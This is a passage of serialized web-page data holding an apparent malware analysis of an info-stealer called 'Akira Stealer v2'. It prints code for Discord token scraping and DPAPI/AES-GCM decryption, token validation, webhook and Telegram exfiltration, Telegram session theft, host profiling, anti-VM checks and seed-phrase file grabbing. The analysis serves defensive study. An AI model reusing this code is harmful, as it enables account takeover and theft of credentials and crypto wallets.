summary\n",[102,16116,16117],{"class":104,"line":656},[102,16118,16119],{},"embed = {\n",[102,16121,16122],{"class":104,"line":662},[102,16123,16124],{},"    \"title\": \"💰 Wallet & Token Exfiltration Report\",\n",[102,16126,16127],{"class":104,"line":668},[102,16128,16129],{},"    \"fields\": [\n",[102,16131,16132],{"class":104,"line":674},[102,16133,16134],{},"        {\"name\": \"Extension Wallets\", \"value\": data.ext_wallets_count},\n",[102,16136,16137],{"class":104,"line":680},[102,16138,16139],{},"        {\"name\": \"Desktop Wallets\",   \"value\": data.desktop_wallets_count},\n",[102,16141,16142],{"class":104,"line":12692},[102,16143,16144],{},"        {\"name\": \"Discord Tokens\",    \"value\": len(valid_tokens)},\n",[102,16146,16147],{"class":104,"line":12698},[102,16148,16149],{},"        {\"name\": \"Telegram Sessions\", \"value\": data.has_telegram},\n",[102,16151,16152],{"class":104,"line":12704},[102,16153,16154],{},"        {\"name\": \"Archive Link\",      \"value\": url or \"[upload failed]\"},\n",[102,16156,16157],{"class":104,"line":12710},[102,16158,16159],{},"    ]\n",[102,16161,16162],{"class":104,"line":12716},[102,16163,10086],{},[102,16165,16166],{"class":104,"line":12722},[102,16167,16168],{},"Webhook.sendDataTG(Utils.get_temp_folder(), chatId, startup)\n",[102,16170,16171],{"class":104,"line":12728},[102,16172,16173],{},"# 4) Cleanup local folder & ZIP\n",[102,16175,16176],{"class":104,"line":12734},[102,16177,15360],{},[41,16179,16181,16182,1288],{"id":16180},"_79-discord-and-telegram-token-theft-class-discord","7.9. Discord and Telegram Token Theft (Class: ",[63,16183,9018],{},[12,16185,47],{},[12,16187,16188,16189,16191],{},"Akira Stealer v2’s ",[251,16190,9018],{}," class executes a highly parallelized, multi-stage process to harvest both Discord authorization tokens and Telegram session data. Below, we dissect each component with precise code references and illustrative examples.",[186,16193,16195],{"id":16194},"_791-initialization-path-enumeration","7.9.1 Initialization & Path Enumeration",[12,16197,192],{},[12,16199,16200],{},"Upon instantiation, the constructor builds two sets of target paths:",[56,16202,16204],{"className":12155,"code":16203,"language":12157,"meta":65,"style":65},"# Discord client LevelDB directories\ndiscord_paths = [\n    [f\"{self.ROAMING}/Discord\", \"/Local Storage/leveldb\"],\n    [f\"{self.ROAMING}/Lightcord\", \"/Local Storage/leveldb\"],\n    ...\n]\n\n# Chromium-based browser LevelDB directories\nbrowserPaths = [\n    [f\"{self.ROAMING}/Opera Software/Opera GX Stable\", \"opera.exe\", \"/Local Storage/leveldb\", ...],\n    [f\"{self.LOCAL}/Google/Chrome/User Data\", \"chrome.exe\", \"/Default/Local Storage/leveldb\", ...],\n    ...\n]\n",[63,16205,16206,16211,16216,16221,16226,16230,16234,16238,16243,16248,16253,16258,16262],{"__ignoreMap":65},[102,16207,16208],{"class":104,"line":105},[102,16209,16210],{},"# Discord client LevelDB directories\n",[102,16212,16213],{"class":104,"line":111},[102,16214,16215],{},"discord_paths = [\n",[102,16217,16218],{"class":104,"line":329},[102,16219,16220],{},"    [f\"{self.ROAMING}/Discord\", \"/Local Storage/leveldb\"],\n",[102,16222,16223],{"class":104,"line":346},[102,16224,16225],{},"    [f\"{self.ROAMING}/Lightcord\", \"/Local Storage/leveldb\"],\n",[102,16227,16228],{"class":104,"line":650},[102,16229,11509],{},[102,16231,16232],{"class":104,"line":656},[102,16233,15585],{},[102,16235,16236],{"class":104,"line":662},[102,16237,11519],{"emptyLinePlaceholder":2181},[102,16239,16240],{"class":104,"line":668},[102,16241,16242],{},"# Chromium-based browser LevelDB directories\n",[102,16244,16245],{"class":104,"line":674},[102,16246,16247],{},"browserPaths = [\n",[102,16249,16250],{"class":104,"line":680},[102,16251,16252],{},"    [f\"{self.ROAMING}/Opera Software/Opera GX Stable\", \"opera.exe\", \"/Local Storage/leveldb\", ...],\n",[102,16254,16255],{"class":104,"line":12692},[102,16256,16257],{},"    [f\"{self.LOCAL}/Google/Chrome/User Data\", \"chrome.exe\", \"/Default/Local Storage/leveldb\", ...],\n",[102,16259,16260],{"class":104,"line":12698},[102,16261,11509],{},[102,16263,16264],{"class":104,"line":12704},[102,16265,15585],{},[1254,16267,16268,16277],{},[1257,16269,16270,16273,16274,1013],{},[251,16271,16272],{},"Discord Paths"," target official and unofficial Discord clients under ",[63,16275,16276],{},"%APPDATA%",[1257,16278,16279,16282],{},[251,16280,16281],{},"Browser Paths"," cover popular browsers’ user data folders, including subfolders for local storage and extensions.",[12,16284,16285],{},"Threads are spawned for each entry:",[56,16287,16289],{"className":12155,"code":16288,"language":12157,"meta":65,"style":65},"for patt in browserPaths:\n    t = Thread(target=self.get_btoken, args=[patt[0], patt[2]])\n    t.start()\nfor patt in discord_paths:\n    t = Thread(target=self.get_discord, args=[patt[0], patt[1]])\n    t.start()\n",[63,16290,16291,16296,16301,16306,16311,16316],{"__ignoreMap":65},[102,16292,16293],{"class":104,"line":105},[102,16294,16295],{},"for patt in browserPaths:\n",[102,16297,16298],{"class":104,"line":111},[102,16299,16300],{},"    t = Thread(target=self.get_btoken, args=[patt[0], patt[2]])\n",[102,16302,16303],{"class":104,"line":329},[102,16304,16305],{},"    t.start()\n",[102,16307,16308],{"class":104,"line":346},[102,16309,16310],{},"for patt in discord_paths:\n",[102,16312,16313],{"class":104,"line":650},[102,16314,16315],{},"    t = Thread(target=self.get_discord, args=[patt[0], patt[1]])\n",[102,16317,16318],{"class":104,"line":656},[102,16319,16305],{},[12,16321,16322],{},"This threading model maximizes I/O throughput, probing dozens of directories concurrently.",[186,16324,16326],{"id":16325},"_792-token-extraction-logic","7.9.2 Token Extraction Logic",[12,16328,192],{},[12,16330,16331],{},[251,16332,16333],{},"Plaintext Token Scraping from Browsers",[12,16335,16336,16339,16340,2901,16343,16346],{},[63,16337,16338],{},"get_btoken(path, arg)"," navigates to each LevelDB folder and inspects ",[63,16341,16342],{},".log",[63,16344,16345],{},".ldb"," files:",[56,16348,16350],{"className":12155,"code":16349,"language":12157,"meta":65,"style":65},"for file in os.listdir(path + arg):\n    if file.endswith((\".log\", \".ldb\")):\n        for line in open(f\"{path}{arg}/{file}\", errors=\"ignore\"):\n            for regex in (r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}\", r\"mfa\\.[\\w-]{80,95}\"):\n                tokens = re.findall(regex, line)\n                for token in tokens:\n                    self.tokens.append(token)\n                    self.cehckToken(token)\n",[63,16351,16352,16357,16362,16367,16372,16377,16382,16387],{"__ignoreMap":65},[102,16353,16354],{"class":104,"line":105},[102,16355,16356],{},"for file in os.listdir(path + arg):\n",[102,16358,16359],{"class":104,"line":111},[102,16360,16361],{},"    if file.endswith((\".log\", \".ldb\")):\n",[102,16363,16364],{"class":104,"line":329},[102,16365,16366],{},"        for line in open(f\"{path}{arg}/{file}\", errors=\"ignore\"):\n",[102,16368,16369],{"class":104,"line":346},[102,16370,16371],{},"            for regex in (r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}\", r\"mfa\\.[\\w-]{80,95}\"):\n",[102,16373,16374],{"class":104,"line":650},[102,16375,16376],{},"                tokens = re.findall(regex, line)\n",[102,16378,16379],{"class":104,"line":656},[102,16380,16381],{},"                for token in tokens:\n",[102,16383,16384],{"class":104,"line":662},[102,16385,16386],{},"                    self.tokens.append(token)\n",[102,16388,16389],{"class":104,"line":668},[102,16390,16391],{},"                    self.cehckToken(token)\n",[1254,16393,16394,16403,16411],{},[1257,16395,16396,16402],{},[251,16397,16398,16399],{},"Regex ",[63,16400,16401],{},"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}"," matches standard Discord tokens.",[1257,16404,16405,16410],{},[251,16406,16398,16407],{},[63,16408,16409],{},"mfa\\.[\\w-]{80,95}"," captures MFA tokens.",[1257,16412,16413,16414,16417],{},"Deduplication is implicit: tokens stored in ",[63,16415,16416],{},"self.tokens"," before validation.",[12,16419,16420],{},[251,16421,16422],{},"Encrypted Token Decryption in Discord Client",[12,16424,16425,16426,1884,16428,16430,16431,16434],{},"Discord’s client encrypts Local Storage entries under DPAPI, prefaced by ",[63,16427,14163],{},[63,16429,14166],{},". ",[63,16432,16433],{},"get_discord(path, arg)"," handles this:",[56,16436,16438],{"className":12155,"code":16437,"language":12157,"meta":65,"style":65},"# Read Local State to obtain encrypted master key\nwith open(path + \"/Local State\", 'r') as f:\n    local_state = json.load(f)\nencrypted_key = b64decode(local_state['os_crypt']['encrypted_key'])[5:]\nmaster_key = self.CryptUnprotectData(encrypted_key)\n\n# Iterate LevelDB files for Base64 payloads\nfor file in os.listdir(path + arg):\n    if file.endswith((\".log\", \".ldb\")):\n        for line in open(f\"{path}{arg}/{file}\"):\n            for token_part in re.findall(r\"dQw4w9WgXcQ:([A-Za-z0-9+/=]+)\", line):\n                ciphertext = b64decode(token_part)\n                token = self.decrypt_value(ciphertext, master_key)\n                self.tokens.append(token)\n                self.cehckToken(token)\n",[63,16439,16440,16445,16450,16454,16459,16464,16468,16473,16477,16481,16486,16491,16496,16501,16506],{"__ignoreMap":65},[102,16441,16442],{"class":104,"line":105},[102,16443,16444],{},"# Read Local State to obtain encrypted master key\n",[102,16446,16447],{"class":104,"line":111},[102,16448,16449],{},"with open(path + \"/Local State\", 'r') as f:\n",[102,16451,16452],{"class":104,"line":329},[102,16453,14761],{},[102,16455,16456],{"class":104,"line":346},[102,16457,16458],{},"encrypted_key = b64decode(local_state['os_crypt']['encrypted_key'])[5:]\n",[102,16460,16461],{"class":104,"line":650},[102,16462,16463],{},"master_key = self.CryptUnprotectData(encrypted_key)\n",[102,16465,16466],{"class":104,"line":656},[102,16467,11519],{"emptyLinePlaceholder":2181},[102,16469,16470],{"class":104,"line":662},[102,16471,16472],{},"# Iterate LevelDB files for Base64 payloads\n",[102,16474,16475],{"class":104,"line":668},[102,16476,16356],{},[102,16478,16479],{"class":104,"line":674},[102,16480,16361],{},[102,16482,16483],{"class":104,"line":680},[102,16484,16485],{},"        for line in open(f\"{path}{arg}/{file}\"):\n",[102,16487,16488],{"class":104,"line":12692},[102,16489,16490],{},"            for token_part in re.findall(r\"dQw4w9WgXcQ:([A-Za-z0-9+/=]+)\", line):\n",[102,16492,16493],{"class":104,"line":12698},[102,16494,16495],{},"                ciphertext = b64decode(token_part)\n",[102,16497,16498],{"class":104,"line":12704},[102,16499,16500],{},"                token = self.decrypt_value(ciphertext, master_key)\n",[102,16502,16503],{"class":104,"line":12710},[102,16504,16505],{},"                self.tokens.append(token)\n",[102,16507,16508],{"class":104,"line":12716},[102,16509,16510],{},"                self.cehckToken(token)\n",[1254,16512,16513,16522],{},[1257,16514,16515,16518,16519,16521],{},[251,16516,16517],{},"Master Key Recovery",": Strips the 5-byte DPAPI header, then calls ",[63,16520,14827],{}," (wrapping Windows DPAPI) to decrypt the AES-GCM key.",[1257,16523,16524,16527,16528,16531,16532,16535,16536],{},[251,16525,16526],{},"Payload Parsing",": Tokens are prefixed with ",[63,16529,16530],{},"dQw4w9WgXcQ:"," (an attacker-chosen marker). After Base64 decoding, ",[63,16533,16534],{},"decrypt_value()"," splits IV and ciphertext:",[56,16537,16539],{"className":12155,"code":16538,"language":12157,"meta":65,"style":65},"def decrypt\\_value(buff, master\\_key):\niv = buff\\[3:15]\npayload = buff\\[15:]\ncipher = AES.new(master\\_key, AES.MODE\\_GCM, iv)\nreturn cipher.decrypt(payload)\\[:-16].decode()\n",[63,16540,16541,16546,16551,16556,16561],{"__ignoreMap":65},[102,16542,16543],{"class":104,"line":105},[102,16544,16545],{},"def decrypt\\_value(buff, master\\_key):\n",[102,16547,16548],{"class":104,"line":111},[102,16549,16550],{},"iv = buff\\[3:15]\n",[102,16552,16553],{"class":104,"line":329},[102,16554,16555],{},"payload = buff\\[15:]\n",[102,16557,16558],{"class":104,"line":346},[102,16559,16560],{},"cipher = AES.new(master\\_key, AES.MODE\\_GCM, iv)\n",[102,16562,16563],{"class":104,"line":650},[102,16564,16565],{},"return cipher.decrypt(payload)\\[:-16].decode()\n",[186,16567,16569],{"id":16568},"_793-token-validation-exfiltration","7.9.3 Token Validation & Exfiltration",[12,16571,192],{},[12,16573,16574],{},"Each extracted token is validated via live API call:",[56,16576,16579],{"className":16577,"code":16578,"language":61},[59],"headers = {\"Authorization\": token}\nresp = requests.get(\"https://discordapp.com/api/v9/users/@me\", headers=headers)\nif resp.status_code == 200:\n    self.cehckToken(token)\n",[63,16580,16578],{"__ignoreMap":65},[1254,16582,16583],{},[1257,16584,16585,805,16588,16591,16592,16595,16596],{},[251,16586,16587],{},"On success",[63,16589,16590],{},"cehckToken()"," determines whether to send via Telegram (",[63,16593,16594],{},"useTg=True",") or Discord webhook:",[56,16597,16599],{"className":12155,"code":16598,"language":12157,"meta":65,"style":65},"if useTg:\nself.sendTokenTg(token)\nelse:\nself.send\\_embed(token)\n",[63,16600,16601,16606,16611,16616],{"__ignoreMap":65},[102,16602,16603],{"class":104,"line":105},[102,16604,16605],{},"if useTg:\n",[102,16607,16608],{"class":104,"line":111},[102,16609,16610],{},"self.sendTokenTg(token)\n",[102,16612,16613],{"class":104,"line":329},[102,16614,16615],{},"else:\n",[102,16617,16618],{"class":104,"line":346},[102,16619,16620],{},"self.send\\_embed(token)\n",[1254,16622,16623],{},[1257,16624,16625,16630],{},[251,16626,16627],{},[63,16628,16629],{},"send_embed"," crafts a rich Discord embed containing user metadata (username, discriminator, email, Nitro status, billing info) using fields from",[56,16632,16635],{"className":16633,"code":16634,"language":61},[59],"user_json = requests.get(...).json()\nusername = user_json[\"username\"]\nid = user_json[\"id\"]\n# embed fields: token, email, phone, IP, flags, Nitro, billing\n",[63,16636,16634],{"__ignoreMap":65},[1254,16638,16639],{},[1257,16640,16641,16646],{},[251,16642,16643],{},[63,16644,16645],{},"sendTokenTg"," sends a plain-text summary over Telegram API.",[186,16648,16650],{"id":16649},"_794-telegram-session-harvesting","7.9.4 Telegram Session Harvesting",[12,16652,192],{},[12,16654,16655],{},"Beyond Discord tokens, the stealer grabs Telegram Desktop sessions:",[56,16657,16659],{"className":12155,"code":16658,"language":12157,"meta":65,"style":65},"@staticmethod\ndef steal_telegram():\n    src = f\"{os.getenv('APPDATA')}/Telegram Desktop/tdata\"\n    Utils.TaskKill(\"telegram.exe\")\n    shutil.copytree(src, os.path.join(Utils.get_temp_folder(), \"Telegram\"))\n",[63,16660,16661,16665,16670,16675,16680],{"__ignoreMap":65},[102,16662,16663],{"class":104,"line":105},[102,16664,12644],{},[102,16666,16667],{"class":104,"line":111},[102,16668,16669],{},"def steal_telegram():\n",[102,16671,16672],{"class":104,"line":329},[102,16673,16674],{},"    src = f\"{os.getenv('APPDATA')}/Telegram Desktop/tdata\"\n",[102,16676,16677],{"class":104,"line":346},[102,16678,16679],{},"    Utils.TaskKill(\"telegram.exe\")\n",[102,16681,16682],{"class":104,"line":650},[102,16683,16684],{},"    shutil.copytree(src, os.path.join(Utils.get_temp_folder(), \"Telegram\"))\n",[1254,16686,16687,16693,16702],{},[1257,16688,16689,16692],{},[251,16690,16691],{},"Process Termination",": Ensures file locks are released.",[1257,16694,16695,16698,16699,16701],{},[251,16696,16697],{},"Recursive Copy",": Steals ",[63,16700,15936],{}," folder, including user sessions, contacts, and cached messages.",[1257,16703,16704,16706,16707,16710],{},[251,16705,9034],{},": The stolen folder is zipped and uploaded via ",[63,16708,16709],{},"sendFilesTG()",", with the download link embedded in a Telegram message.",[12,16712,16713,16714,16716],{},"Akira Stealer’s ",[63,16715,9018],{}," module combines regex-based scraping, DPAPI-backed AES-GCM decryption, live API validation, and multi-protocol exfiltration (webhook + Telegram) to deliver a seamless account takeover capability across both Discord and Telegram platforms.",[41,16718,16720],{"id":16719},"_710-system-profiling","7.10 System Profiling",[12,16722,47],{},[12,16724,16725,16726,16729],{},"Akira Stealer v2 incorporates an extensive system profiling phase to gather host metadata, environment attributes, and network details. This information is collated in the ",[63,16727,16728],{},"Data"," class and later packaged with exfiltrated credentials. Below, we break down the profiling logic with direct code references.",[186,16731,16733,16734,16736],{"id":16732},"_7101-data-class-initialization","7.10.1 ",[63,16735,16728],{}," Class Initialization",[12,16738,192],{},[12,16740,16741,16742,16744],{},"On startup, an instance of ",[63,16743,16728],{}," is created:",[56,16746,16748],{"className":12155,"code":16747,"language":12157,"meta":65,"style":65},"class Data:\n    def __init__(self):\n        self.username = os.getlogin()\n        self.computerName = os.getenv(\"computername\") or \"Unable to get computer name\"\n        self.system_info = f\"Computer Name: {self.computerName}\\n...\"\n        ...\n        self.ip = requests.get(url=\"https://api.ipify.org\").text\n        ipdata = json.loads(requests.post(url=f\"http://ip-api.com/json/{self.ip}\").text)\n        self.country = ipdata.get(\"country\")\n        self.countryCode = ipdata.get(\"countryCode\", \"\").lower()\n",[63,16749,16750,16755,16760,16765,16770,16775,16780,16785,16790,16795],{"__ignoreMap":65},[102,16751,16752],{"class":104,"line":105},[102,16753,16754],{},"class Data:\n",[102,16756,16757],{"class":104,"line":111},[102,16758,16759],{},"    def __init__(self):\n",[102,16761,16762],{"class":104,"line":329},[102,16763,16764],{},"        self.username = os.getlogin()\n",[102,16766,16767],{"class":104,"line":346},[102,16768,16769],{},"        self.computerName = os.getenv(\"computername\") or \"Unable to get computer name\"\n",[102,16771,16772],{"class":104,"line":650},[102,16773,16774],{},"        self.system_info = f\"Computer Name: {self.computerName}\\n...\"\n",[102,16776,16777],{"class":104,"line":656},[102,16778,16779],{},"        ...\n",[102,16781,16782],{"class":104,"line":662},[102,16783,16784],{},"        self.ip = requests.get(url=\"https://api.ipify.org\").text\n",[102,16786,16787],{"class":104,"line":668},[102,16788,16789],{},"        ipdata = json.loads(requests.post(url=f\"http://ip-api.com/json/{self.ip}\").text)\n",[102,16791,16792],{"class":104,"line":674},[102,16793,16794],{},"        self.country = ipdata.get(\"country\")\n",[102,16796,16797],{"class":104,"line":680},[102,16798,16799],{},"        self.countryCode = ipdata.get(\"countryCode\", \"\").lower()\n",[1254,16801,16802,16815],{},[1257,16803,16804,16807,16808,2901,16811,16814],{},[251,16805,16806],{},"Username & Hostname:"," Retrieved via ",[63,16809,16810],{},"os.getlogin()",[63,16812,16813],{},"COMPUTERNAME"," environment variable.",[1257,16816,16817,16820,16821,16824,16825,16827],{},[251,16818,16819],{},"IP Address:"," Fetched with ",[63,16822,16823],{},"requests.get(\"https://api.ipify.org\")",", then geolocated via ",[63,16826,12990],{}," for country and ISO code.",[186,16829,16831],{"id":16830},"_7102-os-and-hardware-enumeration","7.10.2 OS and Hardware Enumeration",[12,16833,192],{},[12,16835,16836],{},"Using Windows Management Instrumentation (WMI) commands:",[56,16838,16840],{"className":12155,"code":16839,"language":12157,"meta":65,"style":65},"# Operating System\nself.computerOS = subprocess.run('wmic os get Caption', shell=True, capture_output=True).stdout\n# Total Physical Memory\nself.totalMemory = subprocess.run('wmic computersystem get totalphysicalmemory', ...)\n# BIOS UUID\nself.uuid = subprocess.run('wmic csproduct get uuid', ...)\n# CPU Identifier\nself.cpu = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:System...\\Processor_Identifier'\", ...)\n# GPU Name\nself.gpu = subprocess.run('wmic path win32_VideoController get name', ...)\n# Windows Product Key\nself.productKey = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\\\Microsoft\\\\Windows NT...SoftwareProtectionPlatform' -Name BackupProductKeyDefault\", ...)\n",[63,16841,16842,16847,16852,16857,16862,16867,16872,16877,16882,16887,16892,16897],{"__ignoreMap":65},[102,16843,16844],{"class":104,"line":105},[102,16845,16846],{},"# Operating System\n",[102,16848,16849],{"class":104,"line":111},[102,16850,16851],{},"self.computerOS = subprocess.run('wmic os get Caption', shell=True, capture_output=True).stdout\n",[102,16853,16854],{"class":104,"line":329},[102,16855,16856],{},"# Total Physical Memory\n",[102,16858,16859],{"class":104,"line":346},[102,16860,16861],{},"self.totalMemory = subprocess.run('wmic computersystem get totalphysicalmemory', ...)\n",[102,16863,16864],{"class":104,"line":650},[102,16865,16866],{},"# BIOS UUID\n",[102,16868,16869],{"class":104,"line":656},[102,16870,16871],{},"self.uuid = subprocess.run('wmic csproduct get uuid', ...)\n",[102,16873,16874],{"class":104,"line":662},[102,16875,16876],{},"# CPU Identifier\n",[102,16878,16879],{"class":104,"line":668},[102,16880,16881],{},"self.cpu = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:System...\\Processor_Identifier'\", ...)\n",[102,16883,16884],{"class":104,"line":674},[102,16885,16886],{},"# GPU Name\n",[102,16888,16889],{"class":104,"line":680},[102,16890,16891],{},"self.gpu = subprocess.run('wmic path win32_VideoController get name', ...)\n",[102,16893,16894],{"class":104,"line":12692},[102,16895,16896],{},"# Windows Product Key\n",[102,16898,16899],{"class":104,"line":12698},[102,16900,16901],{},"self.productKey = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\\\Microsoft\\\\Windows NT...SoftwareProtectionPlatform' -Name BackupProductKeyDefault\", ...)\n",[12,16903,16904,16905,16908],{},"Results are parsed to human-readable strings (",[63,16906,16907],{},"strip()",", index operations) and concatenated into:",[56,16910,16912],{"className":12155,"code":16911,"language":12157,"meta":65,"style":65},"self.system_info = (\n    f\"Computer Name: {self.computerName}\\n\"\n    f\"Total Memory: {self.totalMemory}\\n\"\n    f\"CPU: {self.cpu}\\n\"\n    f\"GPU: {self.gpu}\\n\"\n    f\"Product Key: {self.productKey}\"\n)\n",[63,16913,16914,16919,16924,16929,16934,16939,16944],{"__ignoreMap":65},[102,16915,16916],{"class":104,"line":105},[102,16917,16918],{},"self.system_info = (\n",[102,16920,16921],{"class":104,"line":111},[102,16922,16923],{},"    f\"Computer Name: {self.computerName}\\n\"\n",[102,16925,16926],{"class":104,"line":329},[102,16927,16928],{},"    f\"Total Memory: {self.totalMemory}\\n\"\n",[102,16930,16931],{"class":104,"line":346},[102,16932,16933],{},"    f\"CPU: {self.cpu}\\n\"\n",[102,16935,16936],{"class":104,"line":650},[102,16937,16938],{},"    f\"GPU: {self.gpu}\\n\"\n",[102,16940,16941],{"class":104,"line":656},[102,16942,16943],{},"    f\"Product Key: {self.productKey}\"\n",[102,16945,16946],{"class":104,"line":662},[102,16947,12911],{},[186,16949,16951],{"id":16950},"_7103-vm-detection-anti-sandbox-checks","7.10.3 VM Detection & Anti-Sandbox Checks",[12,16953,192],{},[12,16955,16956,16957,16959],{},"Before deep profiling, the malware invokes ",[63,16958,12328],{}," to detect virtualization or analysis environments:",[56,16961,16963],{"className":12155,"code":16962,"language":12157,"meta":65,"style":65},"if VmProtect.isVM(1):\n    sys.exit()\n",[63,16964,16965,16970],{"__ignoreMap":65},[102,16966,16967],{"class":104,"line":105},[102,16968,16969],{},"if VmProtect.isVM(1):\n",[102,16971,16972],{"class":104,"line":111},[102,16973,16974],{},"    sys.exit()\n",[12,16976,16977],{},"Key checks include:",[1254,16979,16980,16986,16992,16998],{},[1257,16981,16982,16985],{},[251,16983,16984],{},"Registry Keys & Driver Descriptors",": Queries virtualization-related registry entries.",[1257,16987,16988,16991],{},[251,16989,16990],{},"Blacklisted UUIDs & Computer Names",": Matches against known VM fingerprints.",[1257,16993,16994,16997],{},[251,16995,16996],{},"HTTP Simulation",": Attempts to connect to a nonexistent domain under HTTPS.",[1257,16999,17000,17003,17004,805,17007,805,17010,1013],{},[251,17001,17002],{},"Process Blacklist",": Spawns a background thread to kill tools like ",[63,17005,17006],{},"wireshark",[63,17008,17009],{},"ollydbg",[63,17011,17012],{},"ida64",[186,17014,17016],{"id":17015},"_7104-packaging-transmission","7.10.4 Packaging & Transmission",[12,17018,192],{},[12,17020,17021,17022,17025],{},"The collected ",[63,17023,17024],{},"system_info",", IP, and country flag are embedded in the webhook payload headers:",[56,17027,17029],{"className":12155,"code":17028,"language":12157,"meta":65,"style":65},"webhook_payload = {\n    \"embeds\": [{\n        \"title\": f\"💉 Infected {self.computerName}/{self.username} | {self.ip} {flag}\",\n        \"description\": description + \"\\n```⚙️ System Info\\n\" + self.system_info + \"```\",\n        \"fields\": [...]\n    }]\n}\nrequests.post(self.webhook_url, json=webhook_payload)\n",[63,17030,17031,17036,17041,17046,17051,17056,17061,17065],{"__ignoreMap":65},[102,17032,17033],{"class":104,"line":105},[102,17034,17035],{},"webhook_payload = {\n",[102,17037,17038],{"class":104,"line":111},[102,17039,17040],{},"    \"embeds\": [{\n",[102,17042,17043],{"class":104,"line":329},[102,17044,17045],{},"        \"title\": f\"💉 Infected {self.computerName}/{self.username} | {self.ip} {flag}\",\n",[102,17047,17048],{"class":104,"line":346},[102,17049,17050],{},"        \"description\": description + \"\\n```⚙️ System Info\\n\" + self.system_info + \"```\",\n",[102,17052,17053],{"class":104,"line":650},[102,17054,17055],{},"        \"fields\": [...]\n",[102,17057,17058],{"class":104,"line":656},[102,17059,17060],{},"    }]\n",[102,17062,17063],{"class":104,"line":662},[102,17064,10086],{},[102,17066,17067],{"class":104,"line":668},[102,17068,17069],{},"requests.post(self.webhook_url, json=webhook_payload)\n",[1254,17071,17072,17078],{},[1257,17073,17074,17077],{},[251,17075,17076],{},"Flag Emoji",": Derived from ISO country code.",[1257,17079,17080,17083],{},[251,17081,17082],{},"Fields",": Include counts of stolen passwords, cookies, etc., but the system info is in the embed description for immediate context.",[12,17085,17086,17089],{},[251,17087,17088],{},"Summary:","\nSystem profiling in Akira Stealer v2 gathers comprehensive host and network data via WMI commands, environment variables, and IP geolocation. Coupled with VM detection and tool-killing routines, this ensures the attacker has a full snapshot of the compromised environment, enhancing targeted follow-up actions and filtering out analysis sandboxes.",[41,17091,17093,17094,1288],{"id":17092},"_711-file-grabber-class-utilssteal_files","7.11 File Grabber (Class: ",[63,17095,17096],{},"Utils.steal_files",[12,17098,47],{},[12,17100,17101],{},"Beyond browser data and tokens, Akira also attempts to extract valuable user-generated content—such as documents, spreadsheets, private notes, and cryptographic key files. The File Grabber module is responsible for this task. It operates by scanning high-value directories for common file types and patterns, then silently adding them to the exfiltration bundle. What makes this module especially dangerous is its simplicity and focus: it doesn’t attempt to crawl the entire file system. Instead, it targets specific, high-probability locations where sensitive files are typically stored. These include the Desktop, Documents, Downloads, and OneDrive directories—each relative to the user's home path. This focused approach improves both speed and stealth, reducing the likelihood of detection during the scan. It also avoids alerting the user by not accessing system or protected directories. Once files of interest are located, they are copied into a temporary folder, optionally renamed or grouped, and later compressed into the final ZIP archive that’s uploaded in the exfiltration phase.",[186,17103,17105],{"id":17104},"_7111-target-directories-enumeration","7.11.1 Target Directories Enumeration",[12,17107,192],{},[12,17109,17110],{},"The stealer focuses on four high-yield folders:",[56,17112,17114],{"className":12155,"code":17113,"language":12157,"meta":65,"style":65},"searchFolders = [\n    \"Desktop\",\n    \"Documents\",\n    \"Downloads\",\n    \"OneDrive\"\n]\n",[63,17115,17116,17121,17126,17131,17136,17141],{"__ignoreMap":65},[102,17117,17118],{"class":104,"line":105},[102,17119,17120],{},"searchFolders = [\n",[102,17122,17123],{"class":104,"line":111},[102,17124,17125],{},"    \"Desktop\",\n",[102,17127,17128],{"class":104,"line":329},[102,17129,17130],{},"    \"Documents\",\n",[102,17132,17133],{"class":104,"line":346},[102,17134,17135],{},"    \"Downloads\",\n",[102,17137,17138],{"class":104,"line":650},[102,17139,17140],{},"    \"OneDrive\"\n",[102,17142,17143],{"class":104,"line":656},[102,17144,15585],{},[12,17146,17147],{},"Each folder is interpreted relative to the victim’s home directory:",[56,17149,17151],{"className":12155,"code":17150,"language":12157,"meta":65,"style":65},"for folder in searchFolders:\n    current_path = os.path.join(os.environ['USERPROFILE'], folder)\n    if os.path.exists(current_path):\n        # proceed to scan\n",[63,17152,17153,17158,17163,17168],{"__ignoreMap":65},[102,17154,17155],{"class":104,"line":105},[102,17156,17157],{},"for folder in searchFolders:\n",[102,17159,17160],{"class":104,"line":111},[102,17161,17162],{},"    current_path = os.path.join(os.environ['USERPROFILE'], folder)\n",[102,17164,17165],{"class":104,"line":329},[102,17166,17167],{},"    if os.path.exists(current_path):\n",[102,17169,17170],{"class":104,"line":346},[102,17171,17172],{},"        # proceed to scan\n",[186,17174,17176],{"id":17175},"_7112-keyword-extension-filtering","7.11.2 Keyword & Extension Filtering",[12,17178,192],{},[12,17180,17181],{},[251,17182,17183],{},"Keyword List",[12,17185,17186],{},"A predefined set of substrings guides file selection. Only filenames containing at least one keyword are considered:",[56,17188,17190],{"className":12155,"code":17189,"language":12157,"meta":65,"style":65},"keywordsFiles = [\n    \"passw\", \"seed\", \"mnemo\", \"phrase\", \"login\", \"wallet\",\n    \"crypto\", \"token\", \"backup\", \"secret\", \"account\"\n]\n",[63,17191,17192,17197,17202,17207],{"__ignoreMap":65},[102,17193,17194],{"class":104,"line":105},[102,17195,17196],{},"keywordsFiles = [\n",[102,17198,17199],{"class":104,"line":111},[102,17200,17201],{},"    \"passw\", \"seed\", \"mnemo\", \"phrase\", \"login\", \"wallet\",\n",[102,17203,17204],{"class":104,"line":329},[102,17205,17206],{},"    \"crypto\", \"token\", \"backup\", \"secret\", \"account\"\n",[102,17208,17209],{"class":104,"line":346},[102,17210,15585],{},[1254,17212,17213,17229],{},[1257,17214,17215,17218,17219,17222,17223,2901,17226,1013],{},[251,17216,17217],{},"Partial Matches",": Keywords like ",[63,17220,17221],{},"passw"," capture both ",[63,17224,17225],{},"passwords.txt",[63,17227,17228],{},"passw_backup.docx",[1257,17230,17231,17234],{},[251,17232,17233],{},"Broad Coverage",": Encompasses authentication, wallet, crypto, and token-related terms.",[186,17236,17238],{"id":17237},"_7113-allowed-file-types","7.11.3 Allowed File Types",[12,17240,192],{},[12,17242,17243],{},"To minimize noise, a whitelist of extensions is enforced:",[56,17245,17247],{"className":12155,"code":17246,"language":12157,"meta":65,"style":65},"allowed_extensions = [\n    \".txt\", \".doc\", 